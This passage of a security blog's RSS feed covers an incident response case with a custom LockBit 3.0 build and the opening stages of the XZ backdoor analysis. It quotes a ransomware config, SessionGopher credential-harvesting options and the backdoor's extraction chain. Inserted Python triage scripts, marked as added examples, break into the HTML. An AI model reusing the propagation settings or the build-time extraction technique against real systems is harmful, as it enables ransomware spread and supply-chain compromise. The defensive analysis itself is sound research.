  838. <div id="attachment_112393" style="width: 640px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112393" class="size-full wp-image-112393" src="" alt="LB3Decryptor execution" width="630" height="229" srcset=" 630w, 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112393" class="wp-caption-text">LB3Decryptor execution</p></div>
  839. <p>That said, we must once again underscore that even a correctly working decryptor is no guarantee that the attackers will play fair.</p>
  840. <h2 id="the-recent-lockbit-takedown-and-custom-lockbit-builds">The recent LockBit takedown and custom LockBit builds</h2>
  841. <p>In February 2024, the international law enforcement task force <a href="" target="_blank" rel="noopener">Operation Cronos</a> gained visibility into LockBit&#8217;s operations after taking the group down. The collaborative action involved law enforcement agencies from 10 countries, which seized the infrastructure and took control of the LockBit administration environment. However, a few days after the operation, the ransomware group <a href="" target="_blank" rel="noopener">announced</a> that they were back in action.</p>
  842. <p>The takedown operation allowed LEAs to seize the group&#8217;s infrastructure, obtain private decryption keys and prepare a <a href="" target="_blank" rel="noopener">decryption toolset</a> based on a known-victim ID list obtained by the authorities. The <strong>check_decryption_id</strong> utility checks if the ransom ID enabled for the victim is on the list of known decryption keys:</p>
  843. <div id="attachment_112394" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112394" class="size-large wp-image-112394" src="" alt="check_decryption_id.exe execution" width="1024" height="179" srcset=" 1024w, 300w, 768w, 740w, 800w, 1468w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112394" class="wp-caption-text">check_decryption_id.exe execution</p></div>
  844. <p>The <strong>check_decrypt</strong> tool assesses decryptability: while there is a possibility that the files will be recovered, the outcome of the process depends on multiple conditions, and this tool just checks which of these conditions are met in the systems being analyzed. A CSV file is created, listing files that can be decrypted and providing an email address to reach out to for further instructions on restoring the files:</p>
  845. <div id="attachment_112395" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112395" class="size-large wp-image-112395" src="" alt="check_decrypt.exe execution" width="1024" height="411" srcset=" 1024w, 300w, 768w, 872w, 740w, 697w, 800w, 1153w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112395" class="wp-caption-text">check_decrypt.exe execution</p></div>
<p>This toolset caught our attention because we had investigated several cases relating to the LockBit threat. We normally recommend that our customers save their encrypted critical files and wait for an opportunity to decrypt them with the help of threat researchers or artifacts seized by the authorities, which is merely a matter of time. We ran victim IDs and encrypted files analyzed by our team through the decryption tool, but most of them showed the same result:</p>
  847. <div id="attachment_112396" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112396" class="size-large wp-image-112396" src="" alt="Testing the tool on a victim ID obtained by our team" width="1024" height="162" srcset=" 1024w, 300w, 768w, 740w, 800w, 1456w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112396" class="wp-caption-text">Testing the tool on a victim ID obtained by our team</p></div>
<p>The <strong>check_decrypt</strong> tool also confirmed that it was not possible to decrypt the files by using the database of known keys:</p>
  849. <div id="attachment_112397" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112397" class="size-large wp-image-112397" src="" alt="Testing the check_decrypt.exe tool on encrypted files" width="1024" height="499" srcset=" 1024w, 300w, 768w, 718w, 740w, 574w, 800w, 1466w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112397" class="wp-caption-text">Testing the check_decrypt.exe tool on encrypted files</p></div>
  850. <p>Our analysis and previous research confirmed that files encrypted with a payload generated with the help of the leaked LockBit builder could not be decrypted with existing decryption tools, essentially because the independent groups behind these attacks did not share their private keys with the RaaS operator.</p>
  851. <h2 id="geography-of-the-leaked-lockbit-builder-based-attacks">Geography of the leaked LockBit builder-based attacks</h2>
<p>Custom LockBit builds created with the leaked builder were involved in a number of incidents all over the world. These attacks were most likely unrelated and executed by independent actors. The leaked builder has apparently been used by LockBit ransomware competitors to target companies in the Commonwealth of Independent States, violating the group&#8217;s number one rule to avoid compromising CIS nationals. This <a href="" target="_blank" rel="noopener">triggered a discussion</a> on the dark web, where LockBit operators tried to explain that they had nothing to do with these attacks.</p>
  853. <p>In our incident response practice, we have come across ransomware samples created with the help of the leaked builder in incidents in Russia, Italy, Guinea-Bissau, and Chile. Although the builder provides a number of customization options, as we have shown above, most of the attacks used the default or slightly modified configuration. However, one incident stood out.</p>
  854. <h2 id="a-real-life-incident-response-case-involving-a-custom-lockbit-build">A real-life incident response case involving a custom LockBit build</h2>
  855. <p>In a recent incident response engagement, we faced a ransomware scenario involving a LockBit sample built with the leaked builder and featuring impersonation and network spread capabilities we had not seen before. The attacker was able to exploit an internet-facing server that exposed multiple sensitive ports. Somehow, they were able to obtain the administrator password – we believe that it may have been stored in plain text inside a file, or that the attacker may have used social engineering. Then, the adversary generated custom ransomware using the privileged account they had access to. Our team was able to obtain the relevant fields present in the <strong>config.json</strong> file that the attacker used:</p><pre class="crayon-plain-tag">"impersonation": true,
  856. "impers_accounts": "Administrator:************",
  857. "local_disks": true,
  858. "network_shares": true,
  859. "running_one": false,
  860. "kill_defender": true,
  861. "psexec_netspread": true,
"delete_eventlogs": true,</pre>
<p>As we can see, the custom version has the ability to impersonate the administrator account, affect network shares, and spread easily across the network via PsExec.</p>
<p>Moreover, it is configured to allow more than one instance to run on each host. One of the first things the executable does when started is check for, and create, a unique mutex based on a hash sum of the ransomware public key, in the format <strong>&#8220;Global\%.8x%.8x%.8x%.8x%.8x&#8221;</strong>. If the <strong>running_one</strong> flag is set to true in the configuration and the mutex is already present in the operating system, the process will exit.</p>
<p>In our case, the configuration allowed concurrent executions of several ransomware instances on the same host. This behavior, combined with the use of configuration flags for automatic network propagation with high-privileged domain credentials, led to an uncontrolled avalanche effect: each host that got infected then started trying to infect other hosts on the network, including those already infected. From an incident response point of view, this means finding evidence, if available, of different origins for the same threat. The image below shows the evidence found on one host of remote service creation by PsExec, with authentication completed from multiple infected hosts.</p>
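<p>The two observations above, the configuration flags that make a build self-propagating and re-entrant, and the multi-origin PsExec service creation that results, can be turned into simple triage logic. The following Python is an added example, not code from the article or from the builder; the event records are constructed sample data, and their field names are an assumed schema, not a real log format.</p>

```python
"""Triage helpers for a LockBit build made with the leaked builder (added example)."""
from collections import defaultdict

# config.json fields quoted in the article (the password is masked there too).
SAMPLE_CONFIG = {
    "impersonation": True,
    "impers_accounts": "Administrator:************",
    "local_disks": True,
    "network_shares": True,
    "running_one": False,
    "kill_defender": True,
    "psexec_netspread": True,
    "delete_eventlogs": True,
}


def assess_config(cfg):
    """Return risk findings (strings) for a LockBit 3.0 builder config.

    An empty list means none of the propagation / anti-forensics flags
    discussed in the article are set.
    """
    findings = []
    if cfg.get("psexec_netspread"):
        findings.append("psexec_netspread: automatic lateral movement via PsExec")
    if cfg.get("impersonation") and cfg.get("impers_accounts"):
        account = cfg["impers_accounts"].split(":", 1)[0]
        findings.append(f"impersonation: runs with embedded credentials for '{account}'")
    if cfg.get("network_shares"):
        findings.append("network_shares: encrypts reachable shares, not only local disks")
    # running_one=false means the Global\... mutex check does not stop a second
    # instance, so already-infected hosts can be hit again by their peers.
    if not cfg.get("running_one", True) and cfg.get("psexec_netspread"):
        findings.append("running_one=false + psexec_netspread: re-infection avalanche possible")
    if cfg.get("delete_eventlogs"):
        findings.append("delete_eventlogs: expect missing initial-access evidence")
    if cfg.get("kill_defender"):
        findings.append("kill_defender: impairs endpoint protection (Impair Defenses)")
    return findings


# Constructed remote-service-creation records (assumed schema): the PsExec
# service installed on `host`, authenticated from `source`.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T10:02:11", "host": "SRV-FILE01", "service": "PSEXESVC", "source": "SRV-WEB01"},
    {"time": "2024-03-01T10:02:40", "host": "WS-042", "service": "PSEXESVC", "source": "SRV-WEB01"},
    {"time": "2024-03-01T10:05:03", "host": "SRV-FILE01", "service": "PSEXESVC", "source": "WS-042"},
    {"time": "2024-03-01T10:05:59", "host": "SRV-FILE01", "service": "PSEXESVC", "source": "WS-017"},
    {"time": "2024-03-01T10:06:10", "host": "SRV-WEB01", "service": "PSEXESVC", "source": "SRV-FILE01"},
    {"time": "2024-03-01T09:40:00", "host": "SRV-FILE01", "service": "Spooler", "source": "SRV-FILE01"},
]


def find_multi_origin_hosts(events, service_name="PSEXESVC"):
    """Map each host to the distinct remote peers that installed `service_name` on it.

    Only hosts with more than one distinct source are returned: that is the
    signature of several infected machines re-targeting the same host.
    """
    sources = defaultdict(set)
    for ev in events:
        if ev["service"].upper() != service_name or ev["source"] == ev["host"]:
            continue
        sources[ev["host"]].add(ev["source"])
    return {host: sorted(peers) for host, peers in sources.items() if len(peers) > 1}


def infection_order(events, service_name="PSEXESVC"):
    """Hosts in the order they first acted as a PsExec source.

    When the initial-access logs were wiped, as in the article's case, the
    earliest source is the best available candidate for the first victim.
    """
    seen, order = set(), []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["service"].upper() != service_name or ev["source"] == ev["host"]:
            continue
        if ev["source"] not in seen:
            seen.add(ev["source"])
            order.append(ev["source"])
    return order


if __name__ == "__main__":
    for finding in assess_config(SAMPLE_CONFIG):
        print("finding:", finding)
    print("multi-origin hosts:", find_multi_origin_hosts(SAMPLE_EVENTS))
    print("first-seen sources:", infection_order(SAMPLE_EVENTS))
```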
  866. <div id="attachment_112398" style="width: 744px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112398" class="size-full wp-image-112398" src="" alt="Remote service creation by PsExec" width="734" height="766" srcset=" 734w, 287w, 335w, 268w" sizes="(max-width: 734px) 100vw, 734px" /></a><p id="caption-attachment-112398" class="wp-caption-text">Remote service creation by PsExec</p></div>
  867. <p>Although this evidence was present in the infected systems, most of the logs had been deleted by the ransomware immediately after the initial infection. Because of that, it was not possible to determine how the attacker was able to gain access to the server and to the administrator password. The remote service creation logs remained because when the malware was performing lateral movement on the network, it generated new logs, which it did not delete, and which were helpful in detecting its spread across the infrastructure.</p>
  868. <div id="attachment_112399" style="width: 877px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112399" class="size-full wp-image-112399" src="" alt="Event logs cleared" width="867" height="302" srcset=" 867w, 300w, 768w, 740w, 804w, 800w" sizes="(max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-112399" class="wp-caption-text">Event logs cleared</p></div>
  869. <p>By analyzing some of the traces that were not erased on the initial affected server, we identified compressed Gzip data in a memory stream. The data was encoded in Base64. After decoding and decompression, we found evidence of the use of Cobalt Strike. We were able to identify the C2 server used by the attacker to communicate with the affected machine and promptly sent this indicator to the customer for blacklisting.</p>
  870. <p>We also spotted the use of the <a href="" target="_blank" rel="noopener">SessionGopher</a> script. This tool uses WMI to extract saved session information for remote desktop access tools, such as WinSCP, PuTTY, FileZilla, and Microsoft Remote Desktop. This is accomplished by querying <strong>HKEY_USERS</strong> for PuTTY, WinSCP, and Remote Desktop saved sessions. In <strong>Thorough</strong> mode, the script can identify <strong>.ppk</strong>, <strong>.rdp</strong>, and <strong>.sdtid</strong> files in order to extract private keys and session information. It can be run remotely by using the <strong>-iL</strong> option followed by the list of computers. The <strong>-AllDomain</strong> flag allows running it against all AD-joined computers. As shown in the image below, the script can easily extract saved passwords for remote connections. The results can be exported to a CSV file for later use.</p>
  871. <div id="attachment_112400" style="width: 604px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112400" class="size-full wp-image-112400" src="" alt="Password extraction using SessionGopher" width="594" height="688" srcset=" 594w, 259w, 302w, 242w" sizes="(max-width: 594px) 100vw, 594px" /></a><p id="caption-attachment-112400" class="wp-caption-text">Password extraction using SessionGopher</p></div>
  872. <p>Although SessionGopher is designed for collecting stored credentials, it was not the tool used by the attackers for initial credential dumping. Instead, they employed SessionGopher to collect additional credentials and services in the infrastructure at a later stage.</p>
  873. <p>Once we identified the C2 domains and some other IP addresses related to the attacker and extracted details about the impersonated accounts and tools implemented for automatic deployment, the customer changed all affected users&#8217; credentials and configured security controls to avoid PsExec execution, thus stopping the infection. Monitoring network and user account activities allowed us to identify the infected systems and isolate them for analysis and recovery.</p>
  874. <p>This case shows an interesting combination of techniques used to gain and maintain access to the target network, as well as encrypt important data and impair defenses. Below are the TTPs identified for this scenario.</p>
  875. <table width="100%">
  876. <tbody>
  877. <tr>
  878. <td width="35%"><strong>Tactic</strong></td>
  879. <td width="40%"><strong>Technique</strong></td>
  880. <td width="25%"><strong>ID</strong></td>
  881. </tr>
  882. <tr>
  883. <td>Impact</td>
  884. <td>Data Encrypted for Impact</td>
  885. <td><a href="" target="_blank" rel="noopener">T1486</a></td>
  886. </tr>
  887. <tr>
  888. <td>Defense Evasion, Persistence, Privilege Escalation, Initial Access</td>
  889. <td>Valid Accounts</td>
  890. <td><a href="" target="_blank" rel="noopener">T1078.002</a></td>
  891. </tr>
  892. <tr>
  893. <td>Credential Access</td>
  894. <td>Credentials from Password Stores</td>
  895. <td><a href="" target="_blank" rel="noopener">T1555</a></td>
  896. </tr>
  897. <tr>
  898. <td>Lateral Movement</td>
  899. <td>Remote Services</td>
  900. <td><a href="" target="_blank" rel="noopener">T0886</a></td>
  901. </tr>
  902. <tr>
  903. <td>Discovery</td>
  904. <td>Network Service Discovery</td>
  905. <td><a href="" target="_blank" rel="noopener">T1046</a></td>
  906. </tr>
  907. <tr>
<td>Defense Evasion</td>
  909. <td>Clear Windows Event Logs</td>
  910. <td><a href="" target="_blank" rel="noopener">T1070.001</a></td>
  911. </tr>
  912. <tr>
<td>Defense Evasion</td>
  914. <td>Impair Defenses</td>
  915. <td><a href="" target="_blank" rel="noopener">T1562</a></td>
  916. </tr>
  917. </tbody>
  918. </table>
  919. <h2 id="preventive-actions-against-ransomware-attacks">Preventive actions against ransomware attacks</h2>
  920. <p>Ransomware attacks can be devastating, especially if the attackers manage to get hold of high-privileged credentials. Measures for mitigating the risk of such an attack may vary depending on the technology used by the company. However, there are certain infrastructure-agnostic techniques:</p>
  921. <ul>
<li>Using a robust, properly configured antimalware solution, such as <a href="" target="_blank" rel="noopener">Kaspersky Endpoint Security</a></li>
  923. <li>Implementing <a href="" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats</li>
  924. <li>Disabling unused services and ports to minimize the attack surface</li>
  925. <li>Keeping all systems and software up to date</li>
  926. <li>Conducting regular penetration tests and vulnerability scanning to identify vulnerabilities and promptly apply appropriate countermeasures</li>
  927. <li>Adopting regular cybersecurity training, so that employees are aware of cyberthreats and ways to avoid them</li>
  928. <li>Making backups frequently and testing them</li>
  929. </ul>
  930. <h2 id="conclusion">Conclusion</h2>
  931. <p>Our examination of the LockBit 3.0 builder files shows the alarming simplicity with which attackers can craft customized ransomware, as evidenced by a recent incident where adversaries exploited administrator credentials to deploy a tailored ransomware variant. This underscores the need for robust security measures capable of mitigating this kind of threat effectively, as well as adoption of a cybersecurity culture among employees.</p>
  932. <p>Kaspersky products detect the threat with the following verdicts:</p>
  933. <ul>
  934. <li>Trojan-Ransom.Win32.Lockbit.gen</li>
  935. <li>Trojan.Multi.Crypmod.gen</li>
  936. <li>Trojan-Ransom.Win32.Generic</li>
  937. </ul>
  938. <p>And the SessionGopher script, as:</p>
  939. <ul>
  940. <li>HackTool.PowerShell.Agent.l</li>
  942. </ul>
  943. ]]></content:encoded>
  944. <wfw:commentRss></wfw:commentRss>
  945. <slash:comments>0</slash:comments>
  946. <media:content xmlns:media="" url="" width="1200" height="646"><media:keywords>full</media:keywords></media:content>
  947. <media:content xmlns:media="" url="" width="1024" height="551"><media:keywords>large</media:keywords></media:content>
  948. <media:content xmlns:media="" url="" width="300" height="162"><media:keywords>medium</media:keywords></media:content>
  949. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  950. </item>
  951. <item>
  952. <title>XZ backdoor story &#8211; Initial analysis</title>
  953. <link></link>
  954. <comments></comments>
  955. <dc:creator><![CDATA[GReAT]]></dc:creator>
  956. <pubDate>Fri, 12 Apr 2024 08:00:34 +0000</pubDate>
  957. <category><![CDATA[Incidents]]></category>
  958. <category><![CDATA[Backdoor]]></category>
  959. <category><![CDATA[Cyber espionage]]></category>
  960. <category><![CDATA[Linux]]></category>
  961. <category><![CDATA[Malware]]></category>
  962. <category><![CDATA[Malware Descriptions]]></category>
  963. <category><![CDATA[Malware Technologies]]></category>
  964. <category><![CDATA[SSH]]></category>
  965. <category><![CDATA[XZ]]></category>
  966. <category><![CDATA[Unix and macOS malware]]></category>
  967. <guid isPermaLink="false"></guid>
  969. <description><![CDATA[Kaspersky analysis of the backdoor recently found in XZ, which is used in many popular Linux distributions and in OpenSSH server process.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>On March 29, 2024, a single <a href="" target="_blank" rel="noopener">message</a> on the Openwall OSS-security mailing list marked an important event for the information security, open source and Linux communities: the discovery of a malicious backdoor in <strong>XZ</strong>. <strong>XZ</strong> is a compression utility integrated into many popular distributions of Linux.</p>
  971. <p>The particular danger of the backdoored library lies in its use by the OpenSSH server process <strong>sshd</strong>. On several systemd-based distributions, including Ubuntu, Debian and RedHat/Fedora Linux, OpenSSH is patched to use systemd features, and as a result has a dependency on this library (note that Arch Linux and Gentoo are unaffected). The ultimate goal of the attackers was most likely to introduce a remote code execution capability to <strong>sshd</strong> that no one else could use.</p>
  972. <p>Unlike other supply chain attacks we have seen in Node.js, <a href="" target="_blank" rel="noopener">PyPI</a>, <a href="" target="_blank" rel="noopener">FDroid</a>, and the Linux <a href="" target="_blank" rel="noopener">Kernel</a> that mostly consisted of atomic malicious patches, fake packages and typosquatted package names, this incident was a multi-stage operation that almost succeeded in compromising SSH servers on a global scale.</p>
<p>The backdoor in the liblzma library was introduced at two levels. The source code of the build infrastructure that generated the final packages was slightly modified (by introducing an additional file <strong>build-to-host.m4</strong>) to extract the next-stage script that was hidden in a test case file (<strong>bad-3-corrupt_lzma2.xz</strong>). These scripts in turn extracted a malicious binary component from another test case file (<strong>good-large_compressed.lzma</strong>) that was linked with the legitimate library during the compilation process to be shipped to Linux repositories. Major vendors in turn shipped the malicious component in beta and experimental builds. The compromise of XZ Utils is assigned <a href="" target="_blank" rel="noopener">CVE-2024-3094</a> with the maximum severity score of 10.</p>
  974. <h2 id="the-timeline-of-events">The timeline of events</h2>
  975. <p>2024.01.19 XZ website moved to GitHub pages by a new maintainer (<a href="" target="_blank" rel="noopener">jiaT75</a>)<br />
  976. 2024.02.15 &#8220;build-to-host.m4&#8221; is <a href=";a=commitdiff;h=4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e" target="_blank" rel="noopener">added</a> to .gitignore<br />
  977. 2024.02.23 two &#8220;test files&#8221; that contained the stages of the malicious script are <a href=";a=commit;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0" target="_blank" rel="noopener">introduced</a><br />
  978. <u>2024.02.24 XZ 5.6.0 is released</u><br />
  979. 2024.02.26 <a href=";a=commitdiff;h=328c52da8a2bbb81307644efdb58db2c422d9ba7" target="_blank" rel="noopener">commit</a> in CMakeLists.txt that sabotages the <a href="" target="_blank" rel="noopener">Landlock</a> security feature<br />
  980. 2024.03.04 the backdoor leads to <a href="" target="_blank" rel="noopener">issues</a> with Valgrind<br />
  981. 2024.03.09 two &#8220;test files&#8221; are updated, CRC functions are modified, Valgrind issue is &#8220;fixed&#8221;<br />
  982. <u>2024.03.09 XZ 5.6.1 is released</u><br />
  983. 2024.03.28 bug is discovered, Debian and RedHat notified<br />
  984. 2024.03.28 Debian <a href="" target="_blank" rel="noopener">rolls back</a> XZ 5.6.1 to 5.4.5-0.2 version<br />
  985. 2024.03.29 an email is <a href="" target="_blank" rel="noopener">published</a> on the OSS-security mailing list<br />
  986. 2024.03.29 RedHat confirms backdoored XZ was <a href="" target="_blank" rel="noopener">shipped</a> in Fedora Rawhide and Fedora Linux 40 beta<br />
  987. 2024.03.30 Debian <a href="" target="_blank" rel="noopener">shuts down</a> builds and starts process to rebuild it<br />
2024.04.02 XZ main developer <a href="" target="_blank" rel="noopener">recognizes</a> the backdoor incident</p>
  989. <h2 id="backdoored-source-distributions">Backdoored source distributions</h2>
  990. <p><strong>xz-5.6.0</strong></p>
  991. <table width="100%">
  992. <tbody>
  993. <tr>
  994. <td width="15%"><strong>MD5</strong></td>
  995. <td width="85%"><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c518d573a716b2b2bc2413e6c9b5dbde</a></td>
  996. </tr>
  997. <tr>
  998. <td><strong>SHA1</strong></td>
  999. <td>e7bbec6f99b6b06c46420d4b6e5b6daa86948d3b</td>
  1000. </tr>
  1001. <tr>
  1002. <td><strong>SHA256</strong></td>
  1003. <td>0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875</td>
  1004. </tr>
  1005. </tbody>
  1006. </table>
  1007. <p><strong>xz-5.6.1</strong></p>
  1008. <table width="100%">
  1009. <tbody>
  1010. <tr>
  1011. <td width="15%"><strong>MD5</strong></td>
  1012. <td width="85%"><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5aeddab53ee2cbd694f901a080f84bf1</a></td>
  1013. </tr>
  1014. <tr>
  1015. <td><strong>SHA1</strong></td>
  1016. <td>675fd58f48dba5eceaf8bfc259d0ea1aab7ad0a7</td>
  1017. </tr>
  1018. <tr>
  1019. <td><strong>SHA256</strong></td>
  1020. <td>2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8</td>
  1021. </tr>
  1022. </tbody>
  1023. </table>
  1024. <h2 id="initial-infection-analysis">Initial infection analysis</h2>
<p>The XZ git repository contains a set of test files that are used when testing the compressor/decompressor code to verify that it&#8217;s working properly. The account named Jia Tan or &#8220;<a href="" target="_blank" rel="noopener">jiaT75</a>&#8221; <a href="" target="_blank" rel="noopener">committed</a> two test files that initially appeared harmless, but served as the bootstrap to implant the backdoor.</p>
  1026. <p>The associated files were:</p>
  1027. <ul>
  1028. <li><strong>bad-3-corrupt_lzma2.xz</strong> (<a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">86fc2c94f8fa3938e3261d0b9eb4836be289f8ae</a>)</li>
  1029. <li><strong>good-large_compressed.lzma</strong> (<a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">50941ad9fd99db6fca5debc3c89b3e899a9527d7</a>)</li>
  1030. </ul>
  1031. <p>These files were intended to contain shell scripts and the backdoor binary object itself. However, they were hidden within the malformed data, and the attacker knew how to properly extract them when needed.</p>
  1032. <h3>Stage 1 &#8211; The modified <strong>build-to-host</strong> script</h3>
<p>When the XZ release is ready, the official GitHub repository distributes the project&#8217;s source files. Initially, these releases on the repository, aside from containing the malicious test files, were harmless because the files never get the chance to execute. However, the attacker appears to have only added the malicious code that bootstraps the infection when the releases were sourced from <strong>https://xz[.]</strong>, which was under the control of Jia Tan.</p>
  1034. <p>This URL is used by most distributions, and, when downloaded, it comes with a file named <strong>build-to-host.m4</strong> that contains malicious code.</p>
  1035. <p><strong>build-to-host.m4 </strong>(<a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c86c8f8a69c07fbec8dd650c6604bf0c9876261f</a>) is executed during the build process and executes a line of code that fixes and decompresses the first file added to the tests folder:</p>
  1036. <div id="attachment_112357" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112357" class="size-large wp-image-112357" src="" alt="Deobfuscated line of code in build-to-host.m4" width="1024" height="167" srcset=" 1024w, 300w, 768w, 740w, 800w, 1246w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112357" class="wp-caption-text">Deobfuscated line of code in build-to-host.m4</p></div>
  1037. <p>This line of code replaces the &#8220;broken&#8221; data from <strong>bad-3-corrupt_lzma2.xz</strong> using the <strong>tr</strong> command, and pipes the output to the <strong>xz -d</strong> command, which decompresses the data. The decompressed data contains a shell script that will be executed later using <strong>/bin/bash</strong>, triggered by this <strong>.m4</strong> file.</p>
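<p>The discrepancy that Stage 1 relies on, a file shipped in the release tarball but absent from git and deliberately listed in .gitignore, is something a consumer of a source release can check for. The Python below is an added example, not code from the article or from the XZ project: it builds a constructed in-memory tarball, compares it with a constructed list of tracked files and a constructed .gitignore, and reports untracked files that a .gitignore rule would hide from the working tree. The list of known generated files is an assumption for the demo.</p>

```python
"""Triage a release tarball against the project's git tree (added example)."""
import fnmatch
import hashlib
import io
import tarfile

# Constructed: what `git ls-files` would report for the repository.
GIT_TRACKED = {
    "configure.ac", "Makefile.am", "m4/tuklib_cpucores.m4",
    "src/liblzma/check/crc64_fast.c", "src/liblzma/check/crc_x86_clmul.h",
    "tests/files/bad-3-corrupt_lzma2.xz", "tests/files/good-large_compressed.lzma",
}

# Constructed .gitignore, including an entry for the macro the article describes.
GITIGNORE = "*.o\n/configure\n/build-aux/\n/m4/build-to-host.m4\n"

# Assumed: files an autotools release legitimately ships without tracking them.
KNOWN_GENERATED = {"configure", "config.h.in", "aclocal.m4"}


def parse_gitignore(text):
    """Return the non-empty, non-comment patterns of a .gitignore."""
    return [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.startswith("#")]


def ignored_by(path, patterns):
    """Simplified .gitignore matching: anchored (/x) patterns match the path
    exactly or as a directory prefix; others match any path component.
    Returns the first matching pattern, or None."""
    for pat in patterns:
        if pat.startswith("/"):
            prefix = pat[1:].rstrip("/")
            if path == prefix or path.startswith(prefix + "/"):
                return pat
        elif fnmatch.fnmatch(path, pat) or any(fnmatch.fnmatch(p, pat) for p in path.split("/")):
            return pat
    return None


def build_sample_tarball():
    """Construct an in-memory release tarball (prefix xz-5.6.0/) for the demo."""
    members = {
        "configure": b"#!/bin/sh\n# generated by autoconf\n",
        "configure.ac": b"AC_INIT\n",
        "Makefile.am": b"SUBDIRS = src\n",
        "m4/tuklib_cpucores.m4": b"dnl legit macro\n",
        "m4/build-to-host.m4": b"dnl constructed stand-in for the modified macro\n",
        "src/liblzma/check/crc64_fast.c": b"/* crc */\n",
        "src/liblzma/check/crc_x86_clmul.h": b"/* clmul */\n",
        "tests/files/bad-3-corrupt_lzma2.xz": b"\xfd7zXZ\x00constructed",
        "tests/files/good-large_compressed.lzma": b"\x5d\x00\x00constructed",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo("xz-5.6.0/" + name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def triage_tarball(tar_bytes, tracked, gitignore_text):
    """Classify every regular file in the tarball.

    Returns {path: {"tracked": bool, "ignored": pattern-or-None, "sha256": hex}}
    with the top-level release directory stripped, so paths line up with git.
    """
    patterns = parse_gitignore(gitignore_text)
    report = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            path = member.name.split("/", 1)[1] if "/" in member.name else member.name
            data = tar.extractfile(member).read()
            report[path] = {
                "tracked": path in tracked,
                "ignored": ignored_by(path, patterns),
                "sha256": hashlib.sha256(data).hexdigest(),
            }
    return report


def suspicious_files(report, known_generated=KNOWN_GENERATED):
    """Untracked files that a .gitignore rule hides and that are not expected
    build products: the ones to diff against upstream before building."""
    return sorted(p for p, r in report.items()
                  if not r["tracked"] and r["ignored"] and p not in known_generated)


if __name__ == "__main__":
    rep = triage_tarball(build_sample_tarball(), GIT_TRACKED, GITIGNORE)
    for p in suspicious_files(rep):
        print(f"review: {p} (untracked, hidden by {rep[p]['ignored']}, sha256 {rep[p]['sha256'][:16]}...)")
```

Autotools tarballs legitimately carry generated files, so a hit is a prompt to diff the file against the upstream macro, not proof of tampering.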
  1038. <h3 id="stage-2-the-injected-shell-script">Stage 2 &#8211; The injected shell script</h3>
  1039. <p>The malicious script injected by the malicious <strong>.m4</strong> file verifies that it&#8217;s running on a Linux machine and also that it&#8217;s running inside the intended build process.</p>
  1040. <div id="attachment_112358" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112358" class="size-large wp-image-112358" src="" alt="Injected script contents" width="1024" height="229" srcset=" 1024w, 300w, 768w, 1536w, 1568w, 740w, 1255w, 800w, 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112358" class="wp-caption-text">Injected script contents</p></div>
  1041. <p>To execute the next stage, it uses <strong>good-large_compressed.lzma</strong>, which is indeed compressed correctly with XZ, but contains junk data inside the decompressed data.</p>
  1042. <p>The junk data removal procedure is as follows: the <strong>eval</strong> function executes the head pipeline, with each <strong>head</strong> command either ignoring the next 1024 bytes or extracting the next 2048 or 724 bytes.</p>
<p>In total, these commands extracted <strong>33,492</strong> bytes (<strong>2048*16 + 724</strong> bytes). The <strong>tail</strong> command then retains the final <strong>31,265</strong> bytes of the file and ignores the rest.</p>
<p>Then, the <strong>tr</strong> command applies a basic substitution to the output to deobfuscate it. The second XZ command decompresses the transformed bytes as a raw <strong>lzma</strong> stream, after which the result is piped into a shell.</p>
  1045. <h3 id="stage-3-backdoor-extraction">Stage 3 &#8211; Backdoor extraction</h3>
